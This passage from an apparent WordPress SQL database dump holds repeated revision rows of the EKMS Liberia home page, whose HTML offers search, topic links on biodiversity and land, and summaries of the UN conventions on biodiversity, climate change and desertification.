Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-26 07:50:12','2019-11-26 07:50:12','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2791,1,'2019-11-26 07:51:46','2019-11-26 07:51:46','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-26 07:51:46','2019-11-26 07:51:46','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2792,1,'2019-11-26 07:55:55','2019-11-26 07:55:55','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-26 07:55:55','2019-11-26 07:55:55','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2793,1,'2019-11-26 07:56:27','2019-11-26 07:56:27','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-26 07:56:27','2019-11-26 07:56:27','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2794,1,'2019-11-26 07:56:59','2019-11-26 07:56:59','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-26 07:56:59','2019-11-26 07:56:59','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2795,1,'2019-11-26 07:57:40','2019-11-26 07:57:40','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-26 07:57:40','2019-11-26 07:57:40','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2796,1,'2019-11-26 08:02:03','2019-11-26 08:02:03','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" 